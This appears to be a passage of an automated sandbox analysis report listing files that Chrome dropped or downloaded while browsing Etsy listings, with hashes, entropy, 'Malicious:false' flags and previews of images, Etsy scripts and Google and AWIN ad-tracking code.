                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................G....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......T........pixi............ipma.................G.mdat....."*p...h4 2.......1@..eF.G.\..f..UJO.V..:. 4..l.......FTD...v~....SS N..G.......*..../mQ{...az..f.>1.ze.U.]..;W.4..Yvc...cW(i......T8....q..6.7s..f4...^....F.....1.....h..$sEGk.$.,.Om......g.T......%...CO+.....ky.....K...C.<x......S..'8..<CS....bO..A-UVmD#}..YX.wPk.KH..........i..c...K...(m..NKn.Q[;....s.lo..E]O.J....i...a...]...U..e.......n.6>O...;8..M.MQ2ByD..x....b~.....C.Tf......>..^:..$..(O.YC.....S...q...KX.p..Y=:y.+...../....oq.;.nK'.A....."..'L..O.].1Q...z/`.....jsc...0...J:...U..0i..5....1...w.d3.......[.^Z../s.5..D../..0.G......5.+G.e.T}.....!....%..^...j .3BR......g.S..AQ.7.n~..|<xv....C.Cs`.=w..>.xB]...........p.. lh..i5.w.(L....ju~=..d.. [..B...u.e..w".h.qC..eg..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65364)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):697249
                                                                                                                                                                              Entropy (8bit):5.455186889776584
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F619DEBB145A7B29275CEE3DB3CB0E70
                                                                                                                                                                              SHA1:CFB69F66A88B202C52E364FE49C85AE6753AE5BD
                                                                                                                                                                              SHA-256:9AD942312C71B0A4EBF6CFFAEA6925344E9AA72ECB3536066891CD1346ADE80E
                                                                                                                                                                              SHA-512:4610439A3EA38FFF403DB2F768C42F944BD65D962C885BF58331B9361764499109601003C1971F423829D0B58B2759F4110E9A35C2C188AFB574DDD7B2E9AE2D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/bootstrap/listings3/main.d46799b97599498b1cae.js.LICENSE.(()=>{var t={92662:(t,e,i)=>{"use strict";i.d(e,{default:()=>a});var n=i(75448);const s={"rate-n-stars":[["{{value}} stars","{{value}} star","{{value}} stars"],[["is",[0]],["is",[1]],["else"]]],"rating-tooltip-1":"Disappointed","rating-tooltip-2":"Not a fan","rating-tooltip-3":"It's okay","rating-tooltip-4":"Like it","rating-tooltip-5":"Love it",loading:"Loading",error:"Error","new-tab":"Opens a new tab","remove-action":"Remove","dismiss-action":"Dismiss","undo-action":"Undo","select-all":"Select all","add-file-label":"Add file","drop-file-or-label":"Drag and drop or","file-size-bytes":"{{size}} b","file-size-kilobytes":"{{size}} kb","file-size-megabytes":"{{size}} mb","file-size-gigabytes":"{{size}} gb","retry-upload":[["Retry uploads","Retry upload","Retry uploads"],[["is",[0]],["is",[1]],["else"]]],"play-full-video":"Play Full Video","resu
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):10875
                                                                                                                                                                              Entropy (8bit):6.028596844109757
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:391C7D5736DF98CA97A86405B8041D92
                                                                                                                                                                              SHA1:6434C4DB1A74721F8E363849EC4B4B7314A0E654
                                                                                                                                                                              SHA-256:0E16E5E331ED08FAAE535CE5754742FEBDE76A2400414C7DC67A6975B891C861
                                                                                                                                                                              SHA-512:C14FB14B079D46295D3ED4D799DA5A2B22AD77C015C8FFB8FD40B2A183A26C432EA6F4A983EBD093F73F989196D418738E21ACF9D61ABA5D57717A3392475952
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"num":"40b974ea2aeafe83f1cf31bfa4b4e534","img":"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAAApCAIAAABY\/0cVAAAABGdBTUEAANbY1E9YMgAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAB62SURBVHjazFx5sCVVeT9bL\/e+++5bZt57wzALyMgIkgEBBURREBfUmAiICyVLQK0oJn9o0KgloKlgIipqCpFEy7JMSFXigqiAbEoYZEBEAowIg7IMyyxvvUtvZ8n3ndPdt+9bZyhS5a3hcV\/fvt2nv\/X3+77vPLrb3EYN4cQQqikxlChDFCPaN2tCNUAI\/KLxE6LtCb4mc9LspRS+wewRDufDaXgKIcYYxhjVRikF791xo0JKGLyH\/ziHz7n9yFBqvzP\/Rd0XF3xq3P\/cjZghK73oEsdX\/uai14FVwYrsT1o5boqPqHsjperdhUXlVYQQi6+md0HNzDCnI4RmKFu8gyZGUGrSVKosCIPmzFQ6tSujdFCpQSoHiCS+l8J1Q621IdpK34oIFKiV1jTTmbuHlTZKFhSs4UzG83vgx9SqBr6n8CTKtNTwP+75+BvBf8zU8atWLZoaTVhFPPbJ7QPDe7OYfMvj7o37qZc9v7zm0mrpXdOdvNTVFl3DUqeBiAwvPwWj56gG++pKueRqTHkPEJC2mjPOmCnqRcFhhrpipF4TQ34Se6gDvBX1G76geghcJknTLMs8zysvq5mvjDSUc1CBuyKI3hAG1kQDp0K8qSHONkH\/VtmoH4pr58WTwkHfeaGB9cCDmUIXbuWUFtfvOVn1YGng5XF3BCwPHo38CbzK1aLtkmK11Nhnz\/WTkmzR7\/Ii6uC5ioO+cqNCicFPEJnm3GPwa5Jp6mcNP9JU+AIVI4xuUAEuonSWJSRJiM5qjHmUeCCljpdkzPqVFqhEtAlmqGY6
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):91455
                                                                                                                                                                              Entropy (8bit):7.967050070661613
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:4522E7CE51F8E938D799F11C504C39A5
                                                                                                                                                                              SHA1:DF86B235F678B7C383DFF7014DD6D2CE33EFF2AA
                                                                                                                                                                              SHA-256:5E7B244F90AC785D7076658648E1DC51BDF29B7C1982EB3D852998655D58CE72
                                                                                                                                                                              SHA-512:379326D89CE5CBBA01F0982E8C6ADFA8746520DA7EFFA7167252E7FE7A2615A7FCEE477E465CC3C1448257C5AA0734A3C154136CEFF667957B6356D16420D9E4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................G.........................!1A.."Qa.q.2..#BR......3b..r..$4C..%S.c.Ds..................................7.......................!1.AQ..a"q.2..#BR...$...34brC.............?.........+q.x....#..Y.7$c..E.3.g.h.<w...ZO*+..3E..D....z.h..S...'...J.e.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (951), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):951
                                                                                                                                                                              Entropy (8bit):5.58607373842502
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:90335C808036DAF133DECFCDFF89201D
                                                                                                                                                                              SHA1:52A67B8F2C5051BC1FADD134F54CE3E0EDFC91E1
                                                                                                                                                                              SHA-256:1E0987F135EBC4D57A4D32D779C4AA01DD196FA70E7FE64B99E200E23CD1FF7D
                                                                                                                                                                              SHA-512:C60F169E4870549E63D5DB0BFF4F2420926F890F8784FD77AC67F676E18CA41F472F03796B49BC3CF758F8F09F89A38E160AFE6C5439F5CF0E07BF51A53640F5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://9910951.fls.doubleclick.net/activityi;dc_pre=CKHr7Kedn4kDFbib_Qcd5tg4Qg;src=9910951;type=remarkt;cat=unive0;ord=5798595693344;npa=0;auiddc=2084024919.1729505276;u2=%2Fsearch;u3=undefined;ps=1;pcor=430800937;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CKHr7Kedn4kDFbib_Qcd5tg4Qg;src=9910951;type=remarkt;cat=unive0;ord=5798595693344;npa=0;auiddc=*;u2=%2Fsearch;u3=undefined;ps=1;pcor=430800937;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F"/></body></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5212
                                                                                                                                                                              Entropy (8bit):7.907027308830472
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CCF651D8DD2046898996E3CD63051699
                                                                                                                                                                              SHA1:D8DD341F3C79FAF700EF2ABD93E651D9CDDCD743
                                                                                                                                                                              SHA-256:AF5F21369C00B305DDCEFF6C7E045961EAB848277609058BACC4D9A248715A4D
                                                                                                                                                                              SHA-512:4438C109B7EC0D668FD9A9D8C5DD8E06666BEF8C5E823131A06DACF589BB771B1D1C370FC51AF60233F41EC197BF1EC140D05BF8B401E601842BAC88A35417D3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/801a6b/6150787845/il_170x135.6150787845_ia73.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................N...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma..................Vmdat.......a. !..2.&.p.E.Q@.. !t.o.1......M+3.yb.VJ....-i..6.o._.eVJ....P......v.!J....d...H.2q.o.~\Z*o-.jS5`...7...0.......Ht..F...VQc...Z#.k.=..XA..a.r.4Q..3I.jjg).(.......T..f....../}E....xM.....h-..C..*/q.:.Z.!..r......?.....,.....St.|u......1..Q.m.k.hv..../.o.*.*OE.r.;.7.p.b.i.AD....,?..f4..u.$...C....;.E...v..`.a.S......8......[(.J].._c..k.^^......YO......G...'..4..:.gD..j*.G.!%.f.D.}.....&.0.f.b.7..d.jw).SO]............_.g&..h{.iL..C...NZ.......#.I..uM(O....j@.+...q.J.%.)7].J.N.OQ5.......j8..........t.Z]7.H..A.AK.w.G......D...*...\'w...4...CA4...X5.GEN...dB...~Z-.d.K...B[.pU.iiD.r..Q...1y(4.w...N...O!...\..(.!,k..!....O.....6..Y...g...,.t'.=..{T.M$.d..q......0.Y.*.te.....#..%...`\.+..'....?.l9i.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (47001), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):47001
                                                                                                                                                                              Entropy (8bit):5.508559296553846
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:847FC19E3E039A19E62795666C5ACCAB
                                                                                                                                                                              SHA1:697EB031AA705387FD8F66B0D69851B91405EB9E
                                                                                                                                                                              SHA-256:C16F808385A9C70F60CE18C3D32054879DAA62F1FD5441C7E81F576CBB0752B6
                                                                                                                                                                              SHA-512:61CCBF9FDC7F34BC1AFCBE55AA174707065B60969EAE09702A2702FBD3F600FDE194B0FDD2A88221D6F97C10AE321615A904F3B40044C0B351C6CDCF1903E7CC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.dwin1.com/6220.js
                                                                                                                                                                              Preview:var AWIN=AWIN||{};AWIN.Tracking=AWIN.Tracking||{},AWIN.sProtocol="https:"==location.protocol?"https://":"http://",AWIN.iScriptCount=0,AWIN.Tracking.device9Url="https://the.sciencebehindecommerce.com/d9core",AWIN.Tracking.flags={allowNewAWCCookie:!0,allowNewGCLIDCookie:!0},AWIN.Tracking.setFlag=function(e,n){AWIN.Tracking.flags[e]=n},AWIN.Tracking.getFlag=function(e){return AWIN.Tracking.flags[e]},AWIN.tldDomains=["com","org","edu","gov","uk","net","ca","de","jp","fr","au","us","ru","ch","it","nl","se","no","es","mil","gw","ax","wf","yt","sj","mobi","eh","mh","bv","ap","cat","kp","iq","um","arpa","pm","gb","cs","td","so","aero","biz","coop","info","jobs","museum","name","pro","travel","ac","ad","ae","af","ag","ai","al","am","an","ao","aq","ar","as","at","aw","az","ba","bb","bd","be","bf","bg","bh","bi","bj","bm","bn","bo","br","bs","bt","bw","by","bz","cc","cd","cf","cg","ci","ck","cl","cm","cn","co","cr","cu","cv","cx","cy","cz","dj","dk","dm","do","dz","ec","ee","eg","er","et","eu","f
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):54353
                                                                                                                                                                              Entropy (8bit):7.995196216834705
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:723B6B7585BFFD72CE0C00D865C63522
                                                                                                                                                                              SHA1:DC8CAAF7F9607EE9EDF31514ED519E2AEAE5A0D4
                                                                                                                                                                              SHA-256:E0C2A7DC3B29EE16FFCEF74F4E5E71277E77A619B878A87481DB1EBB3854A288
                                                                                                                                                                              SHA-512:389FA767E48759596B6B8B63CDFC399DC9787B24538819C24E47CECCB60B36DF4A7F9A60D39150C83A859A4FF4679E35C8F92A96779AD60148B956DD9AAEAB74
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/30543447/r/il/9bc95d/4546215243/il_600x600.4546215243_t4bq.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................C...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................Kmdat.....&ey_.....2........1@.9vn..4q...s.`.D...(.YW../4.....W..T....5..7=?ul.3.....h.n..!..N.........~...U}..c.G..$)....8....Ne.P...1l.^...._...~...,\.Tm......Q..f^.....<.hr.D..u..>W.Z/.`n.?...8.....lcM.^..l6..BT..]..%...Bvc.Y. .3K...f-5'q..$.^...^..@...s*t./.zf.a....A.8X'...tB.8.]......#<...I.q..i0*..LO`....>..f...p..9.[......Y.?NK.B*..W.......O.z~.. (. 0....oj..m..!.....)..-...)e...+....yW......`Y.....H.l.X..\.m./....8.......sO?..M..%...!......yq..D..;..X.....r.K2Jc.x...HW~.u.)^.d.C2....K.....|_.O%...^0../c.v`...sJF.z...X.....UY.N.D...q..q..F.x.4M..%....-.W.R..^..~z0....B...D.2...N...R...T.....J.#B;.t....v..:..3..a. L>.....mY.....w..z..Kv.x@6..Y5...?..H...I.l.5/. ...GvS.....L.D..X.....w..,.SD.|..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):149805
                                                                                                                                                                              Entropy (8bit):5.6004134683803555
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                              SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                              SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                              SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3141)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):231953
                                                                                                                                                                              Entropy (8bit):5.547771037933138
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1ECBD649FF202704F737D16EA29FAC0B
                                                                                                                                                                              SHA1:597958F5E6E8346AC48ACE23B00447F5EFA44223
                                                                                                                                                                              SHA-256:4B08F41E6CC667DFCEFEEBC41ABA6C28EC3E510541C620CB20D0A050F1A73732
                                                                                                                                                                              SHA-512:F0A0AA8E013F4342F6EBC10E2DCDE80B76D7E1E80A3A9AB5B082D05BA80A77AF1C532EB891FC6AB0F51EE09AD98ACAAECF48921DD8D2BC9A0BDB8C308DE0ADCF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2e244000, 0x760, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (5794), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):5794
                                                                                                                                                                              Entropy (8bit):5.9476945000588195
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:615427208D694195F6F08810005EF661
                                                                                                                                                                              SHA1:DDBA0B6166D071677D6B83AB7D8D1AE378C13983
                                                                                                                                                                              SHA-256:02CFD8D5D4DBE44FA8FC9D662418DE3982F3A413A95C8E8EE9A2E9E7D5E3C834
                                                                                                                                                                              SHA-512:6ACCF22D857C148083417FDABAB72CE91DB714344AAB70486BAF841F7973FC48E1BF0CAAB4DD45D52B5FE958663893E5D7086217540CD431A8F5377FCF5DF47E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googleadservices.com/pagead/conversion/658194373/?random=1729505310914&cv=11&fst=1729505310914&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children%27s%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (783)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):976
                                                                                                                                                                              Entropy (8bit):5.5337199252343074
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BC0E99541747A61B73553038413F1C94
                                                                                                                                                                              SHA1:AA39ACB137EA02DB11296358B9A7301571668282
                                                                                                                                                                              SHA-256:099188318DB5040A60D07B01588AE2610859860DDAC4C31F09E30F2DADEE95E4
                                                                                                                                                                              SHA-512:E16D4387AF24F4FC8F4D640EB83CAA2FEF85E6E382BC88F72E9E4D083F0488E5CA82807F0302321FE8FF0C8239451CC64D65366BFDC54E2D15D37507A74A1085
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:"use strict";(self["jsonp-common-entrypoints"]=self["jsonp-common-entrypoints"]||[]).push([[4357],{84041:(e,t,r)=>{r.r(t);r.d(t,{BreadcrumbHandler:()=>a});var n=r(78661);function s(e,t,r){t in e?Object.defineProperty(e,t,{value:r,enumerable:true,configurable:true,writable:true}):e[t]=r;return e}const i={BREADCRUMB_NAV_LISTING:'[data-ui="listing-breadcrumbs"]',BREADCRUMB_NAV_LIST_ITEM:'[data-ui="list-item-breadcrumbs"]'};class a{constructor(){s(this,"breadcrumbNavListItems",void 0);this.breadcrumbNavListItems=document.querySelectorAll(i.BREADCRUMB_NAV_LIST_ITEM);this.bindEvents()}bindEvents(){var e;null===(e=this.breadcrumbNavListItems)||void 0===e?void 0:e.forEach((e=>{e.addEventListener("click",(()=>{n["default"].logEvent({event_name:"desktop-nav-top-click"})}))}))}}}}]);.//# sourceMappingURL=https://www.etsy.com/sourcemaps/evergreenVendor/en-US/async/common-entrypoints/auto/@etsy-modules/CategoryNav/Views/BreadcrumbNav/BreadcrumbNav.2ed4428587159aa17d58.js.map
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):62940
                                                                                                                                                                              Entropy (8bit):7.996390795697004
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:DEBFD8E23A758DC28847D9DDBB8430DA
                                                                                                                                                                              SHA1:FF16336A6BBF27F84FF9A4FCFF67B36225D98DEA
                                                                                                                                                                              SHA-256:7CEF0BB4B901834599C05CC7B8B0AA5414741EA2AA437C4FB559D7555DE02956
                                                                                                                                                                              SHA-512:202300F1A7709E616704CBC29CE7B5F047524D798B3CFEBAA234FDDB5F4557B0A6B77C6ACAF1D636225C0D1F6056CE538CDA55427B427EB5D98BFE2E3EF9C1B1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/5805144/r/il/8a8b38/5823291546/il_600x600.5823291546_8nt0.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2........1@.._.r..8..2..d...h7.....9...=..iqK.....`Cps<SM...k.^F.la?.2.].c...;....B...K$....=J.Km.......#.4...;+.3.B$.F..A.....n...1...t.~l....B2.(?t../~f..O.)...N.....jh.F....K.r.s.....s.x......,&"_f..5.}.[.1.~.#..m.a..u/`..%gsP..NC]..^O...b.2.,..?...1.x/...NT..=.u.....}..W....{......,.z.(...P.Z.w`..T...y...;<..BE..=......N..3$.....K.d.|w0...QE\M.`...1....T...m.Vx.h0.P.+....y~..........A...~.5N.!c.....5=.`?..a.t..|*I.b...h4..9.(..5..{..z-...:...E..... x.g{.m2....9`N..r~1uQS.V....&...|.tg'.....Rk.W.W.....c.Q.....,..7..dZ&...d6=B5LR;3.}........r.........d.=.[....^..&.........#..~6X}.$4o.U#d...'M.."o.0.....6..*..F..k~.}c..'....F/...d..7.o..m.e|i.......a3.9...>.j...+@hsT.]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18279
                                                                                                                                                                              Entropy (8bit):7.933185211305554
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:19C24B196E0059F3F2A7B735DA6FB71D
                                                                                                                                                                              SHA1:9717F01490B71797E0A2B9EB590F40714FF6731F
